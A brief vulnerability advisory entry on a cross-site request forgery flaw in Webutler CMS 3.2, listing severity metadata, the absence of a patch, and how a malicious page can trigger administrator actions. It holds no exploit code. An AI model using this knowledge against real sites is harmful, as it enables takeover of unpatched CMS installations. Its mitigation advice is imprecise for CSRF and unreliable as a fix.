Vendor: Webutler CMS
By: Keerati T.
CVSS: 8.8 (HIGH)
CWE: 352 (Cross-Site Request Forgery)
Product Name: Webutler CMS
Affected Version From: 3.2
Affected Version To: 3.2
Patch Exists: NO
Related CWE: N/A
CPE: a:webutler:webutler
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2016
Webutler CMS Cross-Site Request Forgery
The Webutler is a simple online page editor for static HTML files. Webmasters can provide a simple login option for image and text editing to their customers. The Webutler is a tool for websites or projects that can be implemented with little effort. The project has grown over the years and now you can do a lot of things with it. All of the administrative functions accept HTTP requests from any user without verifying the request. The exploit can be performed when the logged-on user (administrator) visits a malicious web page that embeds an HTML form.
Mitigation:
Implement proper authentication and authorization checks for all HTTP requests.